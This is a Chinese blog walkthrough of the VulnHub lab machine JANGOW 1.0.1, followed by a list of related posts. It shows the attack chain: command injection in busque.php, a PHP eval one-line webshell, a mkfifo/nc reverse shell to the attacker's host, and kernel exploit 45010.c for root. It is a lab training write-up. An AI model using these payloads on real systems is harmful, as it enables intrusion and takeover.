Vulnhub - JANGOW: 1.0.1

已于 2023-12-05 22:50:57 修改
阅读量142 收藏 2
点赞数
文章标签: web安全
于 2023-12-05 22:50:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuozhuqiu6452/article/details/134818945
版权

Vulnhub

JANGOW: 1.0.1

1、环境

环境准备
攻击机:kali(192.168.56.102)
靶机:JANGOW: 1.0.1(192.168.56.101)
网络设置:

  • VirtualBox中网络设为host-only,并选择手动配置网卡;
  • VM中,kali一块网卡设为桥接,连接到VirtualBox的网卡上,另一块网卡桥接到V8 nat网卡中
    下载好靶机之后直接使用VirtualBox虚拟机导入环境,启动即可。
    目标:提升为root权限获取root目录下的flag

2、信息收集

  • 已知信息:靶机地址192.168.56.101
  • 收集目标信息
    • 使用arp-scan确定同网段中的目标靶机,arp-scan -l在这里插入图片描述
    • 使用nmap扫描查看目标靶机
      • IP地址:nmap 192.168.56.1/24 ,扫描 192.168.0.1-192.168.0.255这一整个网段的ip
      • 端口开放情况:nmap -Pn -sV -p- -A 192.168.56.101
        在这里插入图片描述
        在这里插入图片描述
    • 目录扫描
      • 目标主机开放WEB服务,可以扫描一下目录,看看是否能得到一些敏感目录或者文件
      • dirb http://192.168.56.101
        在这里插入图片描述

3、渗透过程

3.1、收集网站信息

  • 浏览器访问80端口,点击site目录进入网页,查看页面和源代码

  • 点击Buscar按钮出现链接http://192.168.56.101/site/busque.php?buscar= ,发现可能是个传参点,尝试输入whoami,发现是命令执行传参点(RCE漏洞

  • 输入id 获取当前登陆用户的用户名(www-data),以便根据不同的用户权限来执行不同的操作

  • 输入 cat /etc/passwd等命令获取网站中的用户信息
    在这里插入图片描述

  • 查看jangow01用户目录下的文件:ls -arl /home/jangow01
    查看其中的文件user.txt:cat /home/jangow01/user.txt

  • 查看目录下wordpress目录中的文件:ls wordpress
    查看其中config.php文件的内容:cat wordpress/config.php

    在这里插入图片描述

3.2、获取webshell

  • 将一句话木马写入到目录中

    http://192.168.0.103/site/busque.php?buscar=echo](http://192.168.0.103/site/busque.php?buscar=echo) '<?php @eval($_POST('shell'));?>' >> webshell.php

    使用ls命令查看是否成功写入

  • 成功写入后,尝试使用蚁剑等shell连接工具进行连接,拿到目标系统的webshell
    在这里插入图片描述

  • 翻看目录有一个备份文件,得到一个账号密码
    在这里插入图片描述

  • 前期信息收集,发现有开放一个ftp的服务,尝试使用得到的两个账号密码进行登陆
    在这里插入图片描述在这里插入图片描述

3.3、反弹shell

  • 将反弹shell的代码写入服务器目录中

    通过shell连接工具(蚁剑等)在目录中创建shell.php文件,写入如下代码

    <?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.104 443 >/tmp/f');?>

  • kali进行监听,浏览器访问shell.php文件 http://192.168.56.101/site/shell.php
    在这里插入图片描述

  • 将反弹的shell升级为交互式的shell

    反弹的shell功能有限,如没有命令历史记录、文件名称、命令自动完成等,操作比较麻烦。需要升级远程shell(仅限Unix机器)
    在这里插入图片描述
    在这里插入图片描述

  • 根据获取的用户名和密码,尝试登陆到用户的系统中,获取一些信息
    在这里插入图片描述

    • sudo -l #查看jangow01用户的sudo命令

4、提权过程

4.1、收集系统信息

  • unmae -a #查看系统内核
    在这里插入图片描述

4.2、寻找可利用的exp

  • 根据获取的系统信息到exploit-db上找提权的exp,下载exp,直接使用蚁剑上传

  • 或者使用kali中的searchsploit查看
    在这里插入图片描述

  • 寻找45010.c,并查看如何使用
    在这里插入图片描述在这里插入图片描述

    • 注:
      1)若find / -name无法使用,执行umout /run/user/1000/gvfsrm -rf /run/user/1000/gvfs两条命令
      2)也可使用cp命令将45010.c文件复制到指定目录中 cp *source* *target*

  • 将45010.c文件下载到本地
    在这里插入图片描述

4.3、将exp传送到靶机中运行提权

  • 本地搭建http服务器传送文件,但发现目标主机连接不上
  • 使用靶机开放的ftp服务进行传送,ftp连接的是靶场的jangow01用户,上传的文件需要在该用户的目录下才可上传成功
    在这里插入图片描述
  • 编译、加执行权限,执行,成功提权
    在这里插入图片描述

5、总结

(1)获取的账号密码信息可能是通用的,比如系统、其他app等

(2)使用ftp传输文件时,注意连接的用户,只有切换到该用户目录中方可成功传输文件。用户的信息一般存放在/home下以用户名命名的文件夹

(3)反弹shell操作前先获取开放的端口

(4)反弹的shell有时候需要切换到完整的交互式bash;争取获取可交互的shell,会有信息的回显

(5)使用浏览器访问网站的配置文件等脚本信息时,打开开发者模式,有些重要信息是以注释的方式返回,不会回显在页面中,但在回显的代码中会显示

(6)反弹shell

  • nc
  • 访问式反弹,即攻击机nc,浏览器访问靶机中反弹shell的脚本

(7)bp扫描网站漏洞

某某眸某某
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2650
迟到的文章,就当库存发出来吧~
VulnHub_Jangow: 1.0.1
qq_45434762的博客
04-16 612
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关主机信息kali:192.168.31.9 BreakOut:192.168.31.227信息收集使用nmap探测目标主机端口2个端口,一个FTP,一个http80端口网站打开...
vulnhub 靶机 Jangow: 1.0.1
qq_44029310的博客
06-11 2898
一次打靶记录。
VulnHub | Jangow 1.0.1
薛定的餓貓
12-05 3152
VulnHub | Jangow 1.0.1 项目地址 http://www.vulnhub.com/entry/jangow-101,754/ 难度:Easy 测试环境 攻击机:Parrot 192.168.56.104 目标靶机:Ubuntu 192.168.56.118 信息收集 开启目标靶机,登陆界面有其IP地址,不用自己手动扫描。但是还是要用nmap扫一下开启了什么端口。sudo nmap -sS -n -p- 192.168.56.118,然后使用-sV参数查看开放端口的详细信息。 打开网页
Vulnhub靶机:jangow-01-1.0.1
qq_48904485的博客
01-03 512
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:jangow01(10.0.2.4)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/
rocketmq-dashboard-1.0.1-SNAPSHOT.jar
01-08
rocketMQ可视化工具,控制台输入java -jar jar包路径 即可启动服务,访问localhost:8080即可看到仪表台
mq-msgpush-sdk-1.0.1.jar
05-24
《mq-msgpush-sdk-1.0.1.jar:消息推送SDK详解及应用实践》 在IT行业中,消息推送服务已经成为应用程序与用户互动的关键组件。mq-msgpush-sdk-1.0.1.jar是一个专用于消息推送的Java软件开发工具包(SDK),它允许...
emas-services-1.0.1.jar
09-17
<!... ... <artifactId>emas-services <version>1.0.1 mvn install:install-file -DgroupId=com.aliyun.ams -DartifactId=emas-services -Dversion=1.0.1 -Dpackaging=jar -Dfile=F:\jars\emas-services-1.0.1.jar
rocketmq-console-ng-1.0.1.jar
07-22
java -jar rocketmq-console-ng-1.0.1.jar 启动 ---当终端断了该服务就会停止 nohup java -jar rocketmq-console-ng-1.0.1.jar >>/soft/RocketMQ/rocketmqlogs/log.out 2>&1 & 后台启动 --当终端断了也不会停止服务
rocketmq控制台最新版rocketmq-dashboard-1.0.1-SNAPSHOT.jar
06-15
dockerhub的镜像是几年前的了,特意打包了一个最新版分享
【靶场实战】Vulnhub - JANGOW: 1.0.1 靶标实战
做自己喜欢的事,并将其发挥到极致!
05-30 1064
Vulnhub - JANGOW: 1.0.1 靶标实战
vulnhub靶场,JANGOW: 1.0.1
kukudeshuo的博客
02-17 1835
vulnhub靶场,JANGOW: 1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/ 攻击机:kali(192.168.109.128) 靶机:JANGOW: 1.0.1(192.168.109.198) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:提升为root权限获取root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机
vulnhub靶场Jangow: 1.0.1
nightwindnw的博客
01-09 272
闲得无聊,好久没做题了。去vulnhub发现21年好多没做过。找了个Jangow: 1.0.1做做,以此记录……
Vulnhub靶机系列:Jarbas1.0
汗的博客
04-26 778
这次的靶机是vulnhub靶机:Jarbas1.0,因为合天有在线靶机,就直接用合天的在线靶机了。 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权 靶机地址及相关描述 https://www.vulnhub.com/entry/jarbas-1,232/ If you want to keep your hacking studies, please try out...
vulnhub靶场4:jangow01
Genarior的专栏
04-24 156
13、通过蚁剑上传,编译,并执行。提权成功,cat /root/proof.txt。12、通过searchsploit查看是否有可以提权的点,找到45010.c。11、查看系统版本,ubuntu 16.04 内核版本4.4.0-31。3、开放21、80端口,访问http看看,发现命令执行。8、使用蚁剑写入管道方式的反弹shell脚本。1、当nc -e被裁剪,使用管道反弹shell。7、nc没有-e选项,无法反弹shell。6、蚁剑连接 ,找到几个密码。9、443端口成功反弹。3、查看系统提权exp。
Vulnhub靶场】JANGOW: 1.0.1
Nailaoyyds的博客
06-02 668
开局是给IP的 二、web渗透 但是只能查看文件,并不能登录。需要进行下一步操作 翻找敏感文件
Vulnhub-jangow-01-1.0.1靶场练习笔记
qq_54060725的博客
04-17 145
searchsploit搜索ubuntu16.04。把45010.c的代码复制出来,使用蚁剑上传。主机开放21(ftp)和80端口。内核版本是ubuntu16.04。打开终端,查看系统信息进行提权。写入shell.php反弹nc。访问shell.php触发反弹。dirsearch爆破目录。利用echo写入一句话木马。切换完整的交互式bash。发现.backup文件。这里只能反弹443端口。nmap扫描主机端口。gcc编译eva.c。
vulhub靶场-Jangow
最新发布
mashiro_hibiki的博客
03-13 756
发现Local Privilege Escalation(本地权限升级)漏洞,在网上找到了对应了漏洞编号为CVE-2017-16995,该漏洞存在于Linux内核带有的eBPF bpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题。猜测此处存在命令执行或文件包含漏洞,尝试了一下../../../../../../../etc/passwd没有回写,输入whoami命令出现回写。使用ping确认kali是与靶场网络连通的,注意kali要与靶机在同一网段。
Jangow
果粒程
05-15 662
尝试常规的反弹shell,发现都不可以,可能是nc 不支持 -e 参数,这个时候可以使用 mkfifo 命令创建命名管道反弹shell;使用蚁剑在/var/www/html/site/下面新建shell.php文件,内容在下面。使用之前翻到的两个账号密码分别尝试,结果.backup 文件中的可以登陆,翻看下没有什么有用的信息。用浏览器去访问shell.php文件,成功反弹shell。上传exp文件到靶机,增加执行权限,然后执行。我使用的是45010.c,将文件下载到本地。确认开放了21、80端口。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值